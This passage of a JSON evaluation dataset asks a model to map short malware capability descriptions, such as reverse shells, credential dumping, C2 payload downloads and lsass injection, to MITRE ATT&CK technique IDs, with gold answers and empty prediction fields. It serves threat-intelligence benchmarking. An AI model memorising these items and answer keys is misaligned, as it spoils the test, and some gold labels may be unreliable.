+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can create a reverse shell that utilizes statically-linked Wine cmd.exe code to emulate Windows command prompt commands.",
+ "gold": [
+ "T1059"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can decrypt, unpack and load a DLL from its resources.",
+ "gold": [
+ "T1140"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can download additional components from the C2 server.",
+ "gold": [
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "\"can download a hosted \"\"beacon\"\" payload using .\"",
+ "gold": [
+ "T1197"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can download and execute a file from given URL.",
+ "gold": [
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can download files.",
+ "gold": [
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can download files and upgrade itself.",
+ "gold": [
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can dump process memory and extract clear-text credentials.",
+ "gold": [
+ "T1003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can enumerate files and directories.",
+ "gold": [
+ "T1083"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can enumerate registry keys.",
+ "gold": [
+ "T1012"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can enumerate services.",
+ "gold": [
+ "T1007"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can execute shell commands.",
+ "gold": [
+ "T1059"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can gather information about the victim proxy server.",
+ "gold": [
+ "T1016"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can gather the username from the victim\u2019s machine.",
+ "gold": [
+ "T1033"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can gather the victim computer name.",
+ "gold": [
+ "T1082"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can inject content into lsass.exe to load a module.",
+ "gold": [
+ "T1055"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can install as a Windows service for persistence.",
+ "gold": [
+ "T1543.003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can list directory contents.",
+ "gold": [
+ "T1083"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can obtain a list of running processes on the system.",
+ "gold": [
+ "T1057"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can obtain a list of users.",
+ "gold": [
+ "T1087"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can obtain information about network parameters.",
+ "gold": [
+ "T1016"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can obtain the victim time zone.",
+ "gold": [
+ "T1124"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can perform audio capture.",
+ "gold": [
+ "T1123"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can perform credential dumping.",
+ "gold": [
+ "T1003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can perform port scans from an infected host.",
+ "gold": [
+ "T1046"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can perform webcam viewing.",
+ "gold": [
+ "T1125"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can remove itself from a system.",
+ "gold": [
+ "T1070.004"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can retrieve an additional payload from its C2 server.",
+ "gold": [
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can search files on a victim.",
+ "gold": [
+ "T1083"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can sleep for a given number of seconds.",
+ "gold": [
+ "T1029"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can SSH to a remote service.",
+ "gold": [
+ "T1021"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can start, stop, or delete services.",
+ "gold": [
+ "T1569.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can upload and download files, including second-stage malware.",
+ "gold": [
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can use an add on feature when creating payloads that allows you to create custom Python scripts (\u201cscriptlets\u201d) to perform tasks offline (without requiring a session) such as sandbox detection, adding persistence, etc.",
+ "gold": [
+ "T1064"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can use a WMI script to achieve persistence.",
+ "gold": [
+ "T1546.003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can use base64 encoded C2 communications.",
+ "gold": [
+ "T1132"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can use multiple C2 channels, including RSS feeds, Github, forums, and blogs. also collects C2 information via a dead drop resolver.",
+ "gold": [
+ "T1102"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can use Regsvr32 to execute additional payloads.",
+ "gold": [
+ "T1218.010"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can use steganography to hide malicious code downloaded to the victim.",
+ "gold": [
+ "T1001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can use to execute a payload on a remote host. It can also use Service Control Manager to start new services.",
+ "gold": [
+ "T1569.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can use WMI to deliver a payload to a remote host.",
+ "gold": [
+ "T1047"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "captured audio and sent it out to a C2 server.",
+ "gold": [
+ "T1123"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "captures images from the webcam.",
+ "gold": [
+ "T1125"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "checks for anti-malware products and processes.",
+ "gold": [
+ "T1518.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "checks for ant-sandboxing software such as virtual PC, sandboxie, and VMware.",
+ "gold": [
+ "T1518.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "checks for the presence of certain security-related processes and deletes its installer/uninstaller component if it identifies any of them.",
+ "gold": [
+ "T1518.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "checks its directory location in an attempt to avoid launching in a sandbox.",
+ "gold": [
+ "T1083"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "checks the running processes on the victim\u2019s machine.",
+ "gold": [
+ "T1057"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "collects a list of available servers with the command net view.",
+ "gold": [
+ "T1018"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "collects a list of running services with the command tasklist /v.",
+ "gold": [
+ "T1057"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "collects files from the local system.",
+ "gold": [
+ "T1005"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "collects hostname, volume serial number and OS version data from the victim and sends the information to its C2 server.",
+ "gold": [
+ "T1082"
+ ],
+ "predicted": ""
+ },
+ {
